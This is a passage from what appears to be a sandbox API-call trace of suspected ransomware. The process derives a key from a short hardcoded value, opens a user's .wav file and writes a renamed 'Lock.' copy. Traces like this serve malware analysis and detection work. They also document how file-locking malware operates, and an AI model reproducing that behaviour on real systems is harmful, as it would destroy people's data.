wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.255] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.255] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.255] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.255] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.255] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaad80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0208.255] CryptCreateHash (in: hProv=0xa7ca18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0208.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a726a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.256] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0208.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.256] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.256] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0208.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaad50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0208.256] CryptHashData (hHash=0x9e1cb8, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0208.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.256] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.256] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.256] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.257] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.257] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.257] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.257] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.257] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0208.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab110, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0208.257] CryptDeriveKey (in: hProv=0xa7ca18, Algid=0x6601, hBaseData=0x9e1cb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0208.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.257] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.257] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.257] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.257] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.257] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0208.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0208.257] CryptDestroyHash (hHash=0x9e1cb8) returned 1 [0208.258] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.258] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\QibhfcBitUE3eN.wav" (normalized: "c:\\users\\fd1hvy\\music\\qibhfcbitue3en.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0208.260] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.260] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0208.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0208.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0208.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0208.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0208.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0208.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0208.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0208.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0208.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75000 [0208.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.261] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0208.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75000 | out: hHeap=0x2af0000) returned 1 [0208.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0208.262] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.QibhfcBitUE3eN.wav" (normalized: "c:\\users\\fd1hvy\\music\\lock.qibhfcbitue3en.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0208.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0208.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0208.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0208.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0208.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0208.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0208.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0208.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0208.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0208.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0208.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0208.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0208.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e4020 [0208.267] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0208.267] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0208.271] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x2ec0, lpOverlapped=0x0) returned 1 [0208.271] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0208.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0208.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0208.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12ec0) returned 0x2aae878 [0208.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e4020 | out: hHeap=0x2af0000) returned 1 [0208.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 